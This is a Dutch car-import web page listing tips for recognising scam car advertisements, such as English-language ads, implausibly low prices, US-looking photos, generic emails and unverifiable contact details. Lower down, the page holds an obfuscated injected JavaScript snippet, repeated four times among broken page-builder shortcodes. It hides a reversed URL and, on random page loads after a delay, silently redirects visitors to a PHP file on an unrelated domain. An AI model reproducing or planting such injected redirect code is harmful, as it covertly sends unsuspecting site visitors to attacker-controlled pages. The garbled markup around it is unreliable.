Oplichting

Oplichting

Hier onder vindt u goede tips. Laat u niet weerhouden van een aanschaf, maar bel ons bij twijfel! Indien een auto bij een officiele automerkdealer staat hoeft u absoluut niet rekening te houden met oplichting. Car Import Service adviseert altijd een auto bij een merkdealer met fabrieksgarantie te kopen. Zo beperkt u het risico tot nihil.

 • Tip 1-1: Wantrouw Engelstalige advertenties in Duitsland
  Engelstalige advertenties zijn vaak het werk van oplichters. Wanneer je een Engelstalige advertentie tegenkomt, ga hier dan niet te snel op in, tenzij je 100% zeker weet dat het betrouwbaar is. Deze advertenties zijn vaak te herkennen aan gebrekkig Engels (veel taal en grammaticale fouten), een overdreven gebruik van hoofdletters en een schreeuwerige tekst. (Perfect price, Perfect condition, BUY NOW!!, etc). Bel de verkoper om te testen.
 • Tip 1-2: Te lage prijs
  Oplichters bieden vaak dure auto’s aan voor een veel te lage prijs of extreem lage km stand. Als de prijs te mooi is om waar te zijn, dan is het meestal oplichting.
 • Tip 1-3: Dure producten
  Als een adverteerder veel dure en populaire auto’s aanbiedt als; Audi TT Roadster of BMW X5, Cayenne, wees dan extra voorzichtig. Het zijn vaak de duurste uitvoeringen die voor de laagste prijzen staan.
 • Tip 1-4: Grote aantallen
  Wanneer de adverteerder bovenstaande producten in grote aantallen tegelijkertijd aanbiedt.
 • Tip 1-5: Vreemde Foto’s
  Iemand bied een auto in Duitsland aan, maar toont een foto van een auto die in de VS lijkt te staan. Let op de achtergond ( palm bomen, kenteken, merken, kleuren ) en op de maat van de kentekenplaathouders. Smalle kentekenplaathouder is 99% een amerikaans voertuig. In Duitsland groeien niet zomaar palmbomen en veel witte auto’s duid vaak op een warm gebied zoals Florida. Ziet u allemaal chevrolets en pontiacs staan?

 

Indien bovenstaande TIP’s kloppen gaat u verder met het controleren van de volgende TIP’s.

 • Tip 2-1: Bekijk een voorbeeld van een e-mail van een oplichter
  Oplichters gebruiken standaard email teksten. Lijkt het verhaal te algemeen? Dan is het waarschijnlijk iemand die continue emails verstuurd en hoopt op die 1% die er helaas wel in trapt.
 • Tip 2-2: E-mailadres
  Let op het e-mailadres van de adverteerder. Yahoo, andere gratis e-mailadressen kunnen verdacht zijn en adresgegevens zijn zeer moeilijk tot niet te achterhalen.
 • Tip 2-3: Reputatie
  Indien mogelijk Check de reputatie van de adverteerder (klik op het sterretje bij de advertentie, Ebay) Hier zie je wat de ervaringen zijn van andere kopers, die zaken met deze adverteerder hebben gedaan. Let op, ook deze reputaties zijn manipuleerbaar en dus geen garantie!
 • Tip 2-4: Internetoplichting.nl
  Bij toplichting.nl nagaan of de verkoper bekend staat als oplichter. Op deze site staan tevens verschillende links naar instanties waar je terecht kunt.
 • Tip 2-5: Adresgegevens
  Vraag de adverteerder om zijn adresgegevens en telefoonnummer (bij voorkeur een thuisnummer). Staat zijn of haar adres niet bij de advertentie? Doe dan geen moeite.
 • Tip 2-6: Telefoonnummer
  Controleer of het adres en de telefoonnummers correct zijn. Bel de telefoonnummers voor controle. Luister of het toestel wordt doorgeschakeld. Neemt men zonder naam op? Vraagt men “Welke auto?” Dan gaat het hier vaak om een handelaar.
 • Tip 2-7: Contactpersoon
  Het is veiliger om zaken te doen met één en dezelfde contactpersoon.
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topzoeken”]

Auto Zoeken

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1456830692962{margin-bottom: 17px !important;}”]

[vc_separator]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1456831112106{margin-bottom: 10px !important;}”]

Top Merken

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_link” hide_pagination_control=”yes” wrap=”yes”]